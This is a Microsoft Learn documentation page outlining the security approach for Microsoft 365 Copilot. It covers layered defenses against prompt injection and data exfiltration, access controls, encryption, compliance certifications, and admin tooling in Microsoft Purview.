This browser is no longer supported.
Upgrade to Microsoft Edge to take advantage of the latest features, security updates, and technical support.
Note
Access to this page requires authorization. You can trysigning in orchanging directories.
Access to this page requires authorization. You can trychanging directories.
Security is foundational to our approach at Microsoft; it safeguards customer data, supports system integrity, and includes user safety features. This commitment aligns with ourbroader principles of privacy, compliance, and trust. This article outlines our approach to securing Microsoft 365 Copilot and provides guidance you can use to strengthen your AI security posture.
Note
Learn about new features and capabilities inMicrosoft Security products for AI.
Microsoft applies a multi-layered, defense-in-depth strategy to secure Microsoft 365 Copilot at every level, grounded in enterprise security, privacy, and compliance standards. This means that if one layer is breached, others still provide protection. Microsoft's approach is guided byResponsible AI principles and is reinforced by the recently expandedSecure Future Initiative.
Our comprehensive security posture for AI includes:
Each aspect of this foundation forms a safer digital ecosystem for you to confidently adopt AI features and tools.
In addition, Microsoft embeds its Responsible AI principle-based governance across the entire AI lifecycle to help ensure that systems are developed and deployed ethically and securely. This strategy helps ensure AI behaves in ways that are trustworthy, responsible, and inclusive. A core part of the Responsible AI program is designed to identify potential risks, measure their propensity to occur, and build mitigations to manage them, outlined inApplication card: Microsoft 365 Copilot.
Security is integrated from the ground up through ourSecurity Development Lifecycle (SDL). This integration helps ensure that vulnerabilities are identified and mitigated early in the development process. Microsoft also provides tailored security guidance and best practices for developers, engineers, and security professionals working with Microsoft AI technologies. SeeBuild a strong security posture for AI.
Microsoft conducts internal red teaming and commissions third-party assessments that include penetration testing. These assessments help evaluate Microsoft 365 Copilot implementations against traditional vulnerabilities and theOpen Web Application Security Project (OWASP) Top 10 for LLMs. To see the assessments, visit theService Trust Portal.
Microsoft 365 Copilot enforces secure coding and architectural safeguards to prevent misuse, including ransomware generation and remote code execution. Malicious patterns are blocked through prompt inspection and content filtering, while sandboxing helps ensure that Microsoft 365 Copilot operates within constrained execution boundaries. For more information, seeMicrosoft 365 Copilot architecture and how it works.
Microsoft 365 Copilot is protected by a multi-layered defense strategy that combines threat intelligence, AI-specific detection, and architectural containment. Microsoft uses global threat intelligence to monitor adversarial attacks, model manipulation, and data leakage. To see the latest findings, visit theMicrosoft Security: Threat intelligence blog.
Key practices include:
To view the reports, whitepapers, and other resources, visit theService Trust Portal.
Microsoft 365 Copilot mitigates XPIA and agentic vulnerabilities through layered defenses, including markdown sanitization, malicious prompt classifiers, session hardening, and content security policies. These protections help prevent unauthorized actions and data exfiltration across Microsoft 365 Copilot surfaces, and are deployed automatically through Microsoft's cloud infrastructure without customer action required. This methodology also includes continuous testing and containment strategies.
In the event of a successful injection attempt,Microsoft 365 Copilot's architecture helps ensure containment by design. Microsoft 365 Copilot operates within the user's identity and access context, limiting the blast radius of any potential compromise.
Microsoft employs a multi-layered defense strategy across the Microsoft 365 Copilot prompt flow to mitigate risks of prompt injection. Here are some examples of protection features that are active by default and don't require setup:
For more information about how Microsoft safeguards data, enforces privacy controls, and secures AI operations, seeData, Privacy, and Security for Microsoft 365 Copilot.
Microsoft 365 Copilot's layered security model addresses traditional and emerging threats, including scenarios with the potential for data exfiltration, like these:
To help mitigate such scenarios, Microsoft applies its defense-in-depth strategy. This strategy includes continuous monitoring for data leakage vectors, adversarial misuse, and unauthorized access patterns.
Content generated by Microsoft 365 Copilot is governed by the same access controls and compliance policies as other Microsoft 365 content. This means that user permissions, sensitivity labels, and Conditional Access policies are enforced at the point of content generation and access.
Microsoft 365 Copilot adheres to the privacy and compliance standards described inData, Privacy, and Security for Microsoft 365 Copilot. Protections that are enforced through security controls include:
For more information, seeEnterprise data protection in Microsoft 365 Copilot and Microsoft 365 Copilot Chat.
Microsoft 365 Copilot respectsMicrosoft Entra ID permissions andMicrosoft Purview policies. Microsoft 365 Copilot only surfaces organizational data to which individual users have at least view permissions. Policies are enforced by Microsoft Entra ID, Microsoft Purview, andConditional Access.
Microsoft 365 Copilot connectors enhance the value of Microsoft 365 Copilot while maintaining enterprise protections.
Data is encrypted in transit and at rest using FIPS 140-2–compliant technologies, with tenant-level isolation.Double Key Encryption (DKE) helps to ensure that Microsoft can't access protected content without the customer's key, and the content isn't accessible to Microsoft 365 Copilot.
When you have data that's encrypted by Microsoft Purview Information Protection, Microsoft 365 Copilot honors the usage rights granted to the user. Encryption can be applied bysensitivity labels or by restricted permissions in apps in Microsoft 365 by using Information Rights Management (IRM).
For more information about using Purview with Microsoft 365 Copilot, seeMicrosoft Purview data security and compliance protections for generative AI apps.
Microsoft Purview helps you govern AI across hybrid and multicloud environments like Azure, AWS, and Google Cloud. If you haveMicrosoft Security Copilot, you get more AI insights and threat detection capabilities.
Microsoft 365 Copilot is part of Microsoft's enterprise compliance program and benefits from a range of certifications and assessments. These standards include (but aren't limited to):
Microsoft Entra ID, Microsoft Purview, and Microsoft 365 for business enforce Conditional Access, sensitivity labels, and information barriers.
For more information, see the following resources:
Securing your data for AI tools like Microsoft 365 Copilot is a shared responsibility. In addition to what Microsoft does to secure Microsoft 365 Copilot, there are certain tasks your organization must do to manage your data and help ensure you're using AI safely and securely. See theAI shared responsibility model.
Microsoft Purview provides tools to help you secure and govern your data for use in Microsoft 365 Copilot and AI tools. See the following articles:
Note
Security Copilot is an AI-powered security solution that provides real-time assistance in threat detection, incident response, and risk assessment. In the coming months, Security Copilot will be included in Microsoft 365 E5. As you make agentic AI a part of your daily workflows, you can use Security Copilot to manage agents and security across your organization.Learn about Security Copilot inclusion in Microsoft 365 E5 subscription.
Download and review our scenario-based deployment models, presentations, and guides. These resources describe how to rapidly implement a secure-by-default configuration, address oversharing concerns, and prevent data leak to shadow AI. SeeNotes from engineering: Microsoft Purview deployment models.
Microsoft 365 Copilot includes built-in security controls fromMicrosoft Purview. The Copilot security dashboard provides more insights and controls to help you:
To view the dashboard in theMicrosoft 365 admin center, selectCopilot >Overview >Security. To display theSecurity section, you need theGlobal Reader role. To make changes theAI administrator role is required.
Was this page helpful?
Need help with this topic?
Want to try using Ask Learn to clarify or guide you through this topic?
Was this page helpful?
Want to try using Ask Learn to clarify or guide you through this topic?